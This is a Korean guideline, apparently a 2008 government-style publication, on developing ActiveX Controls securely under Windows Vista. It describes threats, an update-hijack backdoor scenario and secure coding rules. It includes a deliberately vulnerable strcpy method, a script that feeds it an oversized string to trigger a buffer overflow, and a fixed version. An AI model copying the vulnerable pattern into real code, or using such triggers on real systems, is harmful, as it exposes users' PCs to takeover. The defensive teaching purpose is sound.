Transcription

1 Windows Vista 용

2

3 목차 ActiveX Control 개발보안가이드라인 제 1 장 개요 7 제1절목적 9 제2절적용대상 10 제3절책자구성 10 제 2 장 ActiveX Control 정의및사용현황 11 제1절 ActiveX Control이란? 13 제2절 ActiveX Control 사용현황 14 제 3 장 ActiveX Control 의위험성 15 제1절잠재적악용가능성이있는 ActiveX Control이란? 17 제2절 ActiveX Control 위협 20 제3절윈도우비스타에서 ActiveX Control 위협 22 제4절 ActiveX Control 악용사례 27 3

4 Contents ActiveX Control 개발보안가이드라인 제 4 장 안전한 ActiveX Control 개발을위한십계명 29 제1절문자열입력값에대한크기검증 31 제2절임의의프로세스를실행할수있는기능금지 37 제3절임의의파일내용에대한읽기기능금지 40 제4절임의의레지스트리내용읽기기능금지 44 제5절업데이트파일에대한신뢰성검증 49 제6절관리자권한의폴더에 ActiveX Control 프로그램설치 52 제7절실행가능한웹사이트의제한 55 제8절 신뢰할수있는사이트추가 남용금지 59 제9절권한상승창에대한우회금지 62 제10절 ActiveX Control의남용금지 69 5 부록 73 [1] 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 75 [2] 윈도우비스타에서의안전한 ActiveX Control 개발을위한체크리스트 87 4

5 목차 ActiveX Control 개발보안가이드라인 [ 그림목차 ] [ 그림 1] 우리나라 PC의평균 ActiveX Control 설치개수 14 [ 그림 2] 2007년웹플러그인취약점 20 [ 그림 3] 대리자프로세스를이용한권한상승 26 [ 그림 4] 취약한 ActiveX Control 사용예 28 [ 그림 5] ActiveX Control 실행예 32 [ 그림 6] 버퍼오버플로우취약점을가진메소드의예 34 [ 그림 7] 메소드를통한버퍼오버플로우취약점악용예 34 [ 그림 8] 메소드의문자열입력값에대한크기검증을수행한예 35 [ 그림 9] 파라미터를통한버퍼오버플로우취약점악용예 36 [ 그림 10] 임의의프로세스를실행할수있도록구현된메소드의예 37 [ 그림 11] 임의의프로세스실행기능악용예 39 [ 그림 12] 임의의파일읽기기능을구현한메소드의예 41 [ 그림 13] 임의의파일읽기기능악용예 42 [ 그림 14] 잘못구현된파일읽기필터링의예 43 [ 그림 15] 올바르게구현된파일읽기필터링의예 43 [ 그림 16] 임의의레지스트리내용읽기기능을구현한메소드의예 45 [ 그림 17] 임의의레지스트리읽기기능악용예 46 [ 그림 18] 잘못구현된레지스트리읽기필터링의예 47 [ 그림 19] 올바르게구현된레지스트리읽기필터링의예 48 [ 그림 20] 정상적인 DLL 업데이트예 50 5

6 Contents ActiveX Control 개발보안가이드라인 [ 그림 21] 악용되어 DLL이변조되는예 51 [ 그림 22] DLL 파일이낮은권한의폴더에설치되어있는예 54 [ 그림 23] SiteLock Template 적용 (1) 57 [ 그림 24] SiteLock Template 적용 (2) 57 [ 그림 25] SiteLock Template 적용 (3) 57 [ 그림 26] SiteLock Template 적용 (4) 58 [ 그림 27] SiteLock Template 적용 (5) 58 [ 그림 28] 신뢰할수있는사이트추가를강제하는예 61 [ 그림 29] 권한상승창 63 [ 그림 30] Elevation Policy를통한권한상승예 66 [ 그림 31] Ajax가적용된지도검색사이트 71 [ 그림 32] FLEX가적용된영화예매사이트 71 [ 그림 33] SilverLight가적용된방송다시보기사이트 72 [ 표목차 ] [ 표 1] 잠재적악용가능성이있는 ActiveX Control의인터페이스및옵션 19 [ 표 2] ActiveX Control이가질수있는운영체제별권한 23 [ 표 3] 대리자프로세스를통한권한상승예 67 6

7 2008 제 1 장 개 요 제1절목적제2절적용대상제3절책자구성

8

9 제1절 목적 제 1장 개 요 제1절 목적 전자정부와 같은 다양한 서비스들이 웹을 기반으로 개발되면서 ActiveX Control에 대한 활 용이 점차 확대되고 있다. 그러나, ActiveX Control은 악의적인 사용자에 의해 악용될 수 있어 ActiveX Control을 안전하게 제작하는 것이 중요하다. 특히, 윈도우 비스타(Windows Vista) 제1장 개 요 가 출시되면서 ActiveX Control 악용을 방지하기 위한 보안기능들이 제공되고 있지만, 많 은 개발자들은 새로운 보안기능에 대한 이해가 여전히 부족한 상황이다. 이에 따라 본 보안가이드라인에서는 윈도우 비스타에서 ActiveX Control 개발 시 지켜 야할 주요 보안문제에 대해 기술한다. ActiveX Control 개발 보안가이드라인 9

10 제 1 장 개요 제 2 절적용대상 본보안가이드라인에서는윈도우비스타에서 ActiveX Control 개발시준수해야할항목별체크리스트, 주의사항을따르지않을경우발생할수있는위험성, 해킹에악용된사례및문제해결방안을설명한다. 제 3 절책자구성 2장에서는 ActiveX Control의정의및현황에대하여살펴본다. 3장에서는 ActiveX Control의위험성을소개하고보안기능이강화된윈도우비스타에서도여전히위험한이유를기술한다. 4장에서는안전한 ActiveX Control 개발을위해반드시점검해야할사항을 10가지로분류하여기술한다. 부록1에서는 4장에서기술된 ActiveX Control 개발시반드시지켜야하는사항을항목별로요약하며, 부록2에서는 ActiveX Control 개발시에스스로점검해볼수있도록체크리스트를제공한다. 10

11 2008 제 2 장 ActiveX Control 정의및사용현황 제1절 ActiveX Control이란? 제2절 ActiveX Control 사용현황

12

13 제 1 절 ActiveX Control 이란? 제 2 장 ActiveX Control 정의및사용현황 본장에서는 ActiveX Control 의정의및현황에대하여기술한다. 제 1 절 ActiveX Control 이란? ActiveX는기존의정적인텍스트와그림만으로구성된웹문서에서탈피하여동적이고화려한멀티미디어문서로작성을가능하게하는 Microsoft 의기술이다. ActiveX는 ActiveX Control, ActiveX Script, ActiveX Document 등의기술을총칭하는의미이며본고에서는 ActiveX 기술중 ActiveX Control에관한내용을다룬다. MSDN에서는 ActiveX Control은 IUnknown 인터페이스를제공하는간단한형태의 OLE 오브젝트이며다양한기능제공을위해 IUnknown 이외에많은인터페이스들을제공한다 라고정의한다. 제 2 장 ActiveX Control 정의및사용현황 13

14 제 2 장 ActiveX Control 정의및사용현황 제 2 절 ActiveX Control 사용현황 ActiveX Control은실행파일형식으로제공되어클라이언트 PC에서실행되는프로그램이다. 이러한이유로 ActiveX Control은웹을통해풍부한기능과미려한디자인을제공할수있다. [ 그림 1] 은우리나라개인사용자의컴퓨터에설치되어있는 ActiveX Control 현황을보여주고있다. 운영체제와함께설치되는 ActiveX Control을포함하여컴퓨터당평균 400~ 700개정도의 ActiveX Control이설치되어있다. 특히인터넷뱅킹, 포털, 게임, 쇼핑몰등대부분의상업적웹사이트에서 ActiveX Control을배포하고있다. 예를들어, 인터넷뱅킹서비스를이용하기위해서사용자는키보드보안프로그램, PC 방화벽, 백신, 피싱방지프로그램과같은 ActiveX Control들을설치해야한다. PC설치 ActiveX Control 개수 : 여개 [ 그림 1] 우리나라 PC 의평균 ActiveX Control 설치개수 14

15 2008 제 3 장 ActiveX Control 의위험성 제1절잠재적악용가능성이있는 ActiveX Control이란? 제2절 ActiveX Control 위협제3절윈도우비스타에서 ActiveX Control 위협제4절 ActiveX Control 악용사례

16

17 제 1 절잠재적악용가능성이있는 ActiveX Control 이란? 제 3 장 ActiveX Control 의위험성 ActiveX Control 은사용자 PC의자원접근과같이인터넷익스플로러에서지원할수없는기능을제공하기위해사용되는웹플러그인이다. ActiveX Control 은인터넷익스플로러내부에서동작되는응용프로그램이기때문에인터넷익스플로러와같은권한을가지고동작한다. 이러한이유로윈도우 XP에서 ActiveX Control 이악용되면임의의파일및레지스트리에대한읽기 / 쓰기가가능해지고, 관리자권한으로프로세스가실행될수있다. 2007년 Microsoft 에서는보안이강화된인터넷익스플로러 7과윈도우비스타를출시했다. 윈도우비스타와인터넷익스플로러 7에서채택한가장중요한보안기능은보호모드 (Protected Mode) 1) 이다. 이를이용하면다수의심각한 ActiveX Control 취약점을차단할수있다. 하지만, 아무리좋은보안시스템이라도사용자와개발자들이제대로활용하지못하면, 보안수준향상으로이어지지않는다. 본장에서는잠재적악용가능성이있는 ActiveX Control 을정의하고위협현황및속성을살펴본다. 또한, 강화된보안기능을가진윈도우비스타에서새롭게적용된자원접근권한을살펴보고, 축소된 ActiveX Control 의권한변화에도불구하고여전히존재하는위협에대하여기술한다. 제 3 장 ActiveX Control 의위험성 제 1 절잠재적악용가능성이있는 ActiveX Control 이란? 보안의관점에서 ActiveX Control이중요한이유는웹페이지나이메일에포함된스크립트에의해사용자 PC에설치된 ActiveX Control이실행될수있기때문이다. ActiveX Control은스크립트언어등에서실행될수있지만, 일반적인스크립트언어와는달리보안상제약을받지않는다. 즉, 클라이언트측스크립트언어에서는사용자 PC에파일을생 1) 보호모드 (Protected Mode) : 인터넷익스플로러에게최소한의사용권한만을허용하여악의적인공격으로부터사용자를보호하게하는기법참고 URL= 17

18 제3 장 ActiveX Control의 위험성 성한다거나 프로세스를 실행하는 행위가 엄격히 제한되지만, ActiveX Control은 파일 생 성, 레지스트리 키 생성 등이 가능하다. 이러한 의미에서 본 가이드라인에서는 잠재적 악용 가능성이 있는 ActiveX Control 을 HTML 언어 혹은 스크립트 언어에서 호출 가능한 ActiveX Control로 정의한다. ActiveX Control이 스크립트 언어에서 호출될 수 있다하더라도 아무런 외부 입력 값을 받지 않는다면 악용될 가능성은 거의 없다2). 사용자 입력이 가능하기 위해서는 ActiveX ActiveX Control 개발 보안가이드라인 Control은 [표 1]과 같은 인터페이스 및 옵션이 설정되어 있어야 한다. 2) 매우 예외적인 경우로 외부 입력 값이 전혀 존재하지 않더라도 악용 가능한 ActiveX Control이 존재한다. 예 를 들면, ActiveX Control이 초기 구동시 웹브라우저가 접속한 서버에 특정 파일을 다운로드하여 사용자 PC 에 설치하도록 구현되어 있다면 악의적인 서버에서 해당 ActiveX Control을 구동할 경우 악성 파일을 사용자 PC에 설치할 수 있어 외부 입력값이 없어도 악용 가능하다. 18 ActiveX Control 개발 보안가이드라인

19 제 1 절잠재적악용가능성이있는 ActiveX Control 이란? [ 표 1] 잠재적악용가능성이있는 ActiveX Control 의인터페이스및옵션 IDispatch[Ex] 인터페이스지원, Safe for Scripting 옵션설정 대상 ActiveX Control이 IDispatch 혹은 IDispatchEx 인터페이스를지원하고 Safe for Scripting 옵션이설정된경우사용자의동의없이외부의입력값을받을수있으므로잠재적악용가능성이있는 ActiveX Control로정의할수있다. IDispatch와 IDispatchEx는메소드이름을통해 ActiveX Control의메소드를호출하기위해필요한인터페이스이며, 스크립트상에서사용자동의없이메소드가실행되기위해서는 Safe for Scripting 옵션이설정되어있어야한다. IPersistPropertyBag[2] 인터페이스지원, Safe for Initialization 옵션설정 대상 ActiveX Control 이 IPersistPropertyBag 혹은 IPersistPropertyBag2 인터페이스를지원하고 Safe for Initialization 옵션이설정된경우사용자의동의없이외부의입력값을받을수있으므로잠재적악용가능성이있는 ActiveX Control로정의할수있다. 여기서 IPersistPropertyBag와 IPersistPropertyBag2는 <object> 태그의 <param> 태그를이용하여 ActiveX Control에초기값전달하기위해필요한인터페이스이며, 사용자동의없이웹문서상에서초기값전달을위해서는 Safe for Initialization 옵션이설정되어있어야한다. IPersistStream 인터페이스지원, Safe for Initialization 옵션설정대상 ActiveX Control이 IPersistStream 인터페이스를지원하고 Safe for Initialization 옵션이설정 제 3 장 ActiveX Control 의위험성 된경우사용자의동의없이외부의입력값을받을수있으므로잠재적악용가능성이있는 ActiveX Control로정의할수있다. 여기서 IPersistStream은 <object> 태그의 DATA 속성을이용하여 ActiveX Control에초기값전달하기위해필요한인터페이스이며, 사용자동의없이웹문서상에서초기값전달을위해서는 Safe for Initialization 옵션이설정되어있어야한다. 19

20 제 3 장 ActiveX Control 의위험성 제 2 절 ActiveX Control 위협 본절에서는 ActiveX Control 을이용한위협현황및속성에대하여기술한다. 1. ActiveX Control 위협현황 [ 그림 2] 는전체웹플러그인취약점에서 ActiveX Control 취약점이차지하는발생비율을나타내고있다. 전체웹플러그인취약점중 ActiveX Control 취약점이 2007년상반기에 89%, 하반기에 79% 를차지할정도로많은부분을차지하는것을확인할수있다 년 1 월 2007 년 6 월 2007 년 7 월 2007 년 12 월 [ 그림 2] 2007 년웹플러그인취약점 출처 : Symantec Corporation 2. ActiveX Control 위협속성 ActiveX Control은사용자의동의하에혹은일반응용프로그램이설치되면서함께설치되지만, 일단사용자 PC에설치된후에는임의의웹페이지에서 ActiveX Control들을실행시킬수있을뿐만아니라, ActiveX Control은아무런보안상의제약없이클라이언트시스템의자원에접근할수있다. 따라서, ActiveX Control은적절한보안조치가없이개 20

21 제1 절잠재적악용가능성이제있는 2절 ActiveX Control 이란위협? 발될경우공격자들에의해악용될소지가매우높다. MS Office나아래한글과같은응용프로그램들도많은 ActiveX Control들을포함하고, 전자정부및전자상거래와같이웹을통한서비스가활발해지면서최근 ActiveX Control 의위험성이다시부각되고있다. ActiveX Control 취약점을이용한공격은다음과같은세가지측면으로인해더욱위험하다. 가. 원격공격 원격에서공격자가악성이메일을희생자에게보내고, 희생자는악성이메일을열람하는것만으로백도어가설치될수있다. 나. 조용한공격서버의경우침입탐지시스템설치, 로그분석등다양한보호대책이강구되어있기때문에공격사실을쉽게탐지하여관리자는신속하게대응할수있다. 하지만, PC의경우보안지식이부족한사용자들이관리를하고있어공격사실을인지하지못하는경우가많다. 즉, ActiveX Control 취약점을통해희생자 PC에백도어가설치되면상당한기간동안희생자는침해사실을인지하지못하기때문에지속적인정보유출이일어난다. 또한, ActiveX Control은웹브라우저내부에서동작하기때문에취약점을이용하여침입하는과정에서개인방화벽과같은정보보호시스템도공격사실을탐지하지못한다. 제 3 장 ActiveX Control 의위험성 다. 효과적인공격 ActiveX Control 취약점으로인해개개인들이업무용으로사용중인 PC가장악될경우, PC에저장된수많은민감한정보와중요문서들을손쉽게획득할수있다. 또한, 외부에서접근이불가능한내부서버에대한추가적인공격도가능하다. 21

22 제 3 장 ActiveX Control 의위험성 제 3 절윈도우비스타에서 ActiveX Control 위협 본절에서는강화된보안기능을가진윈도우비스타의기능중 ActiveX Control 보안관점에서의변화를살펴보고여전히존재하는위협에대하여기술한다. 1. ActiveX Control 을사용한자원접근권한의변화 ActiveX Control을이용한취약점의파급효과는취약한 ActiveX Control의권한에달려있다. 따라서본절에서는윈도우비스타와윈도우 XP에서 ActiveX Control의자원접근권한의차이를살펴본다. 윈도우비스타에서는인터넷익스플로러와 ActiveX Control의자원접근권한을제한하기위해서사용자계정컨트롤 (UAC : User Access Control), MIC(Mandatory Integrity Control) 그리고 UIPI(User Interface Privilege Isolation) 메커니즘을추가하였다. UAC에서는사용자의권한이관리자라하더라도평소에는제한된관리자권한으로작업을수행하고사용자가개별적으로허락하는경우에만관리자권한으로응용프로그램들을실행한다. MIC는낮은 Integrity 3) 프로세스가상위 Integrity 오브젝트에대한쓰기권한을제한하며, UIPI는낮은 Integrity 프로세스가상위 Integrity 프로세스에게윈도우메시지를전송하거나후킹하는행위를제한한다. 상기세가지보안메커니즘으로인해윈도우비스타에서낮은 Integrity 권한을가지는 ActiveX Control은대부분의파일및레지스트리에대한읽기작업만이가능하며사용자컴퓨터에저장되어있는민감함데이터에대한쓰기작업을수행할수없다. 또한, 상위 Integrity 권한을가진프로세스실행시사용자의동의가필요하다. [ 표 2] 는 ActiveX Control이윈도우 XP와윈도우비스타플랫폼에서가질수있는자원접근권한을정리한것이다. 3) Integrity : 윈도우비스타에서새로도입된보안개념으로각각의프로세스나파일, 레지스트리의접근권한을낮음 (Low), 중간 (Medium), 높음 (High), 시스템 (System) 으로나누고이를 Integrity Level 이라부름 22

23 제 3 절윈도우비스타에서 ActiveX Control 위협 [ 표 2] ActiveX Control 이가질수있는운영체제별권한 권한 운영체제 윈도우 XP 윈도우비스타 낮은 Integrity 권한을가진파일 / 레지스트리키에대한쓰기 중간이상의 Integrity 권한을가진파일 / 레지스트리키에대한쓰기 N/A 4) 가능 가능 불가능 낮은 Integrity 권한을가진프로세스실행 N/A 가능 중간이상의 Integrity 권한을가진프로세스실행가능사용자동의필요 파일및레지스트리키읽기가능가능 2. 윈도우비스타에서발생할수있는 ActiveX Control 취약점윈도우비스타의강화된보안정책에도불구하고 ActiveX Control을이용한취약점은여전히존재한다. 본절에서는내재된취약점과사용자및개발자의편의로인해발생하는취약점들에대하여기술한다. 제 3 장 ActiveX Control 의위험성 가. 파일및레지스트리읽기취약점 ActiveX Control의파일및레지스트리읽기취약점이란 ActiveX Control을통하여사용자 PC의파일및레지스트리가외부로유출될수있는취약점을말한다. [ 표 2] 에서도알수있듯이 ActiveX Control의파일및레지스트리에대한읽기권한은윈도우비스타에서도윈도우 XP와마찬가지로제한되지않는다. 따라서기존의파일및레지스트리읽기취약점의위협은동일하게존재한다. 파일및레지스트리에대한읽기취약점이존재하면, 공격자는사용자시스템의중요파일및레지스트리정보를외부로유출할수있다. 4) N/A : 윈도우 XP 의경우낮은 Integirty 개념이존재하지않음. 따라서, N/A 로지정된권한은해당운영체제에서가능한것으로봐야함 23

24 제 3 장 ActiveX Control 의위험성 나. 파일및레지스트리쓰기취약점 ActiveX Control의파일및레지스트리쓰기취약점이란 ActiveX Control을통하여파일및레지스트리를생성후악성행위를수행할수있는취약점을말한다. ActiveX Control은중간 Integrity 폴더인 시작프로그램 폴더나높은 Integrity 폴더인 Program Files 폴더에쓰기작업이불가능하다. 따라서악의적인사용자도 ActiveX Control 취약점을이용하여 시작프로그램 폴더에악성코드를생성할수없다. 그러나, 이러한제한사항은개발자에게도적용되어사용자의동의없이 Program Files 와같은폴더에존재하는프로그램파일들을업데이트할수없다는문제가발생한다. 일부개발자들은 ActiveX Control을사용자동의없이업데이트하기위해낮은 Integrity 폴더에 ActiveX Control을설치한다. 이런경우악의의사용자는 ActiveX Control 파일쓰기취약점을악용하여 dll 파일등을변조함으로써악성코드를실행할수있다. 비슷하게레지스트리쓰기취약점을통해낮은 Integrity 레지스트리에저장된민감한정보를변조할수있다. 다. 프로세스실행취약점 ActiveX Control의프로세스실행취약점이란 ActiveX Control을통하여프로세스를생성후악성행위를수행할수있는취약점을말한다. 윈도우비스타에서도낮은 Integrity 권한으로프로세스를실행하기위해 CreateProcessAsUser API 등을사용하는 ActiveX Control에는프로세스실행취약점이존재한다. 상위 Integrity 권한으로프로세스를실행하는 ActiveX Control은항상사용자의동의가필요하므로프로세스실행취약점이존재하더라도사용자동의없이는악용이불가능하다. 24

25 제 3 절윈도우비스타에서 ActiveX Control 위협 라. 버퍼오버플로우취약점 ActiveX Control의버퍼오버플로우취약점이란 ActiveX Control이긴문자열입력을올바르게처리하지못하여버퍼오버플로우가발생함으로써악성코드가실행될수있는취약점을말한다. 윈도우비스타에서는 Address Space Layout Randomization 기법 5) 을적용하여버퍼오버플로우공격을어렵게만들었으나인터넷익스플로러에서동작하는 ActiveX Control의버퍼오버플로우취약점은 DLL 파일들의로딩주소와연관없는 heap spraying 6) 기법을이용하여악용되므로여전히취약하다. 마. 신뢰할수있는사이트 등록으로인한취약점 ActiveX Control이실행되는웹서버를사용자가 신뢰할수있는사이트 로등록하게되면보호모드 (Protected Mode) 7) 가동작되지않아윈도우 XP에서발생할수있는 ActiveX Control 취약점이그대로존재할수있다. 제 3 장 ActiveX Control 의위험성 5) ASLR(Address Space Layout Randomization) : 버퍼오버플로우공격을방지하기위하여 DLL 이메모리에로드되는주소를랜덤하게변경하는기법참고 URL= 6) heap spraying : 7) 보호모드 (Protected Mode) : 보호모드가실행되면 UAC, MIC, UIPI 기능이동작한다. 25

26 제 3 장 ActiveX Control 의위험성 바. 사용자동의없는권한상승에의한취약점사용자의동의를통해권한을상승시키는것은수시로확인 ( 동의 ) 창을띄워개발자와사용자들에게많은불편을준다. 이에개발자들은 Microsoft 에서지원하는 Elevation Policy 8) 나 [ 그림 3] 처럼높은권한의대리자프로세스 9) 를이용하여사용자동의없이 ActiveX Control의권한을상승시킨다. 권한상승된 ActiveX Control은윈도우 XP에서와동일한취약점 10) 들이존재할수있다. [ 그림 3] 대리자프로세스를이용한권한상승 8) Elevation Policy : 권한상승과관련된레지스트리를설정하여사용자동의없이인터넷익스플로러가중간 Integrity 를가지는프로세스를생성하는방법참고 URL= 9) 대리자프로세스 : ActiveX Control 보다높은권한을가지고 ActiveX Control 의역할을대행하는프로세스참고 URL= 10) 윈도우 XP 에서와동일한취약점 : 권한이상승된 ActiveX Control 은윈도우 XP 에서와마찬가지로관리자권한으로악성행위를수행할수있기때문에윈도우비스타를통해개선된보안정책에영향을받지않으므로더욱위험하다. 26

27 제 4 절 ActiveX Control 악용사례 제 4 절 ActiveX Control 악용사례 본절에서는 ActiveX Control의보안을고려하지않고개발된악용사례를기술한다. [ 그림 4] 는 ActiveX Control 기능의악용예이다. [ 그림 4] 의왼쪽은정상적인 ActiveX Control의사용흐름을보여주고있고오른쪽은공격자가악용한사례이다. 보안을고려하지않고개발된자동업데이트기능을가진 ActiveX Control은아래와같이악용될수있다. 공격자는 100만명이상의가입자를갖는온라인포커게임을타겟으로하여게임을사용하기위해사용자 PC에설치되는 ActiveX Control의취약점을분석하여자동업데이트취약점을찾는다. 공격자는온라인포커게임사용자에게유인성이메일을보내정상적인게임서버가아닌공격자가구축한서버로접속하게하고, 온라인포커게임을위해사용자 PC에설치된 ActiveX Control을구동한다. 사용자 PC에서구동된 ActiveX Control은업데이트를위해공격자의서버에게최신업데이트정보를요구하고, 공격자의서버는소프트웨어버전정보및관련파일등조작된정보를사용자 PC에게보여준다. 제 3 장 ActiveX Control 의위험성 사용자 PC는조작된정보에따라공격자서버에업데이트시필요한파일 ( 백도어 ) 을요청한다. 사용자 PC에서구동된 ActiveX Control은다운로드받은백도어를설치, 실행하게되고공격자는사용자 PC의제어권을획득한다. 27

28 제 3 장 ActiveX Control 의위험성 Activex Control 의정상적인사용 Activex Control 의악용 사용자컴퓨터 공격자 피해자를유인하는이메일전송 pokerlauncher 축하. 방문부탁 사용자컴퓨터 게임서버 포커게임을즐기기위해게임사이트방문 악의적인사이트방문 포커게임을위해설치된 ActiveX Control 구동 포커게임을위해설치된 ActiveX Control 구동 pokerlauncher pokerlauncher 게임의최신버전정보요구 최신버전및다운로드를위한파일정보전달 전달받은정보를이용해업데이트파일다운요청 pokerlauncher pokerlauncher 게임의최신버전정보요구 조작된최신버전및다운로드 ( 백도어 ) 파일정보전달 전달받은정보를이용해백도어파일다운요청 pokerlauncher 최신업데이트파일다운 pokerlauncher 백도어파일다운로드 pokerlauncher 온라인포커게임시작 pokerlauncher 업데이트파일실행 백도어파일실행 [ 그림 4] 취약한 ActiveX Control 사용예 28

29 2008 제 4 장 안전한 ActiveX Control 개발을위한십계명 제1절문자열입력값에대한크기검증제2절임의의프로세스를실행할수있는기능금지제3절임의의파일내용에대한읽기기능금지제4절임의의레지스트리내용읽기기능금지제5절업데이트파일에대한신뢰성검증제6절관리자권한의폴더에 ActiveX Control 프로그램설치제7절실행가능한웹사이트의제한제8절 신뢰할수있는사이트추가 남용금지제9절권한상승창에대한우회금지제10절 ActiveX Control의남용금지

30

31 제 1 절문자열입력값에대한크기검증 제 4 장 안전한 ActiveX Control 개발을위한십계명 본장에서는윈도우비스타에서의안전한 ActiveX Control 개발을위한 10여가지주의사항에대하여기술한다. 제안된십계명은윈도우비스타에서 ActiveX Control 개발시빈번히발생하는취약점유형을근간으로선정하였다. 제 1 절문자열입력값에대한크기검증 1. 개요 ActiveX Control은보통인터넷익스플로러웹브라우저에서스크립트를통해실행된다. HTML 상에서 <param> 태그를통하여 ActiveX Control이초기화될때의파라미터를설정할수있고, <script> 태그를통하여변수를사용하듯이프라퍼티 (property) 를설정할수있고, 함수를사용하듯이메소드를호출할수있다. [ 그림 5] 는 PokerLauncher라는 ActiveX Control이문자열입력값을통해실행되는예이다. Server라는파라미터에문자열 가설정되어초기화되고, Title이라는프라퍼티에문자열 My Poker 4 가설정되고, StartGame이라는메소드가인자로문자열 poker.exe 와숫자 0을받아호출되도록실행되게된다. 즉, 파라미터 Server, 프라퍼티 Title, 메소드 StartGame은문자열입력값을가진다. 제 4 장안전한 ActiveX Control 개발을위한십계명 31

32 제 4 장 안전한 ActiveX Control 개발을위한십계명 <object id= PokerLauncher classid= clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx > <param name= Server value= > </object> <script> PokerLancher.Title= My Poker 4 ; PokerLauncher.StartGame( poker.exe, 0); </script> [ 그림 5] ActiveX Control 실행예 문자열입력값에대한크기검증이란이와같이파라미터, 프라퍼티, 메소드를통해 ActiveX Control에입력되는문자열이미리할당된메모리의크기보다클때버퍼오버플로우와같은치명적인오류를일으키지않게입력값을필터링하는행위를말한다. 문자열입력값에대하여크기를검증하지않으면버퍼오버플로우취약점이발생할수있다. 버퍼오버플로우취약점이발생하면, 공격자는취약한해당 ActiveX Control을악용하여사용자시스템을장악하고중요파일의변조나삭제등피해를줄수있다. 버퍼오버플로우취약점을방지하기위해서는반드시미리허용된길이의문자열만을입력받고, 이후문자열을처리하는과정에서도할당한버퍼보다더긴문자열을복사하지않도록프로그램을제작하여야한다. 미리할당된메모리보다큰문자열이입력으로들어왔을때는오류를리턴하고, 문자열을복사할때는미리할당된버퍼크기보다문자열이크진않은지항상확인하며, strcpy 함수대신에 strncpy_s 함수를, memcpy 함수대신에 memcpy_s 함수를사용하는등문자열복사에보다안전한함수를사용하여프로그램을구현하는것이바람직하다. 2. 검증항목 HTML에서 <param> 태그를통해파라미터로문자열을입력으로받아처리하는경우에는사전에할당한크기를넘지않는지확인하는루틴이항상포함되어야한다. 스크립트에서프라퍼티 (property) 가문자열을입력받아처리하는경우에는프로그램에서할당한크기를넘지않는지확인하는루틴이항상포함되어야한다. 32

33 제 1 절문자열입력값에대한크기검증 스크립트에서메소드 (method) 가인자로문자열을입력으로받아처리하는경우에는프로그램에서할당한크기를넘지않는지확인하는루틴이항상포함되어야한다. 3. 검증항목간과시위험성 문자열을입력받는파라미터, 프라퍼티, 메소드등이미리할당된메모리보다큰문자열의입력 ( 일반적으로 1000자이상의매우긴문자열 ) 에대해적절히처리되지않을경우, 버퍼오버플로우취약점이발생할수있다. 버퍼오버플로우취약점이발생하면, 공격자는취약한해당 ActiveX Control을이용하여사용자시스템을장악하고악성코드를설치하거나중요파일을변조또는삭제하는등사용자시스템에치명적인피해를입힐수있게된다. 버퍼오버플로우로인한보안위협은 ActiveX Control의가장대표적인보안취약점유형이기때문에 ActiveX Control 개발시부터철저한검증이필요하다. 소스코드를작성할때부터주위를해야함은물론, 아래와같은공개된버퍼오버플로우취약점검사도구를활용하여컴파일후실행시에도문제가없는지확인하여야한다. COMRaider idefense Labs의 COM 퍼징도구 URL: COM 퍼징도구 URL: bh-usa-03/bh-us-03-bretmounet-combust.zip 제 4 장안전한 ActiveX Control 개발을위한십계명 AxMan HD Moore의 ActiveX Control 퍼징도구 URL: 33

34 제 4 장 안전한 ActiveX Control 개발을위한십계명 4. 사례 가. 메소드를통해서문자열을입력받아버퍼오버플로우가발생하는사례 [ 그림 6] 은메소드를통한문자열입력값에대한크기검증을하지않은예를보여주는의사코드이다. MyActiveX라는이름을가진 ActiveX Control의 StartGame 메소드가입력값인 x를 buffer에복사하도록구현되어있다. 이경우 buffer가가질수있는최대크기는 20바이트인데만약 x가 20바이트보다크게입력되었을경우버퍼오버플로우가발생하는취약점을가지고있다. void MyActiveX::StartGame(char * x, int y) { char buffer[20]; strcpy(buffer, x); // copy x to buffer...( 생략 )... } [ 그림 6] 버퍼오버플로우취약점을가진메소드의예 [ 그림 7] 은 [ 그림 6] 에서구현된 MyActiveX의 StartGame 메소드가공격자에의해악용되는예이다. [ 그림 7] 과같은공격자가만든스크립트가웹게시물이나이메일을통해사용자시스템에서실행되면, 취약점을가진 StartGame 메소드가사용자몰래호출되어 [ 그림 6] 의 strcpy를통해 buffer에미리할당된 20바이트를넘어다른스택영역까지문자열을덮어쓰는버퍼오버플로우가발생하게된다. 버퍼오버플로우가발생하면, 공격자는사용자시스템의제어권을획득하고악성코드를설치하는등해킹을수행할수있다. <object id= PokerLauncher classid= clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx > </object> <script> PokerLauncher.StartGame( AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAA, 0); </script> [ 그림 7] 메소드를통한버퍼오버플로우취약점악용예 34

35 제 1 절문자열입력값에대한크기검증 StartGame이안전하게구현되려면, StartGame의문자열입력값인 x에대하여크기를검증하여야한다. [ 그림 8] 은 StartGame을수정하여크기검증을구현한예를보여주는의사코드이다. strlen 함수를통해문자열입력값 x의길이가 20 이상인경우는에러처리하였으며, strcpy 함수대신에 strncpy_s 함수를사용하여버퍼오버플로우에대한보안을강화하였다. 또한, NULL 체크및 memset 함수를통한메모리초기화도프로그램의보안성과안전성을향상시키는데크게도움이된다. void MyActiveX::StartGame2(char * x, int y) { char buffer[20]; memset(buffer, 0x00, 20); // Initialize buffer if(x==null) return; // Check NULL input if(strlen(x) >= 20) // Check Length of x { /*...Here comes Error Handling Code... */ return; } strncpy_s(buffer, 20, x, 20-1); // Use strncpy_s(), instead of strcpy()...( 생략 )... } [ 그림 8] 메소드의문자열입력값에대한크기검증을수행한예 나. 파라미터를통해서문자열을입력받아버퍼오버플로우가발생하는사례 제 4 장안전한 ActiveX Control 개발을위한십계명 [ 그림 9] 는파라미터의버퍼오버플로우취약점을악용하는예를보여준다. 메소드의경우와마찬가지로문자열입력값에대한크기검증을수행하지않았다면해당파라미터는버퍼오버플로우취약점을가질수있다. 이와같은파라미터를통한버퍼오버플로우취약점을방지하기위해서는프로그램내에문자열입력값을받는파라미터가사용되는부분에대해서반드시크기검증과정을구현하여야만한다. 35

